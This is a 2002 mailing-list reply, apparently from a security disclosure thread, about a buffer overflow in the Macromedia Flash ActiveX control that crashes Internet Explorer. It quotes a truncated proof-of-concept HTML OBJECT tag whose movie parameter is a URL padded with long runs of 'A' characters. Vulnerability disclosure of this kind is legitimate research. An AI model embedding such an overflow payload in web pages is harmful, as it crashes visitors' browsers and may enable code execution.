Re: Macromedia Flash Activex Buffer overflow

From: MegaHz (megahzat_private)
Date: Sat Jan 05 2002 - 11:30:25 PST

what I got is a warning that explorer has to close, so the buffer overflow
is successfull

but what about if you put a buffer 10 times bigger of this one
there is a buffer overflow, obviously    but, with no warnings,     IE, it
just closes...

I made an html file which it's around 4MB big,

c'ya

/*
 * Andreas Constantinides (MegaHz)
 * Admin of cHp (www.cyhackportal.com)
 *
 */

> From: "Enrique A. Compań Gzz." <enriqueat_private>

> <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">
> <PARAM NAME=movie

VALUE="http://AAA.AAAAAAAAAAAAAAA.AAA/AAAAAAAA.swf?AAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA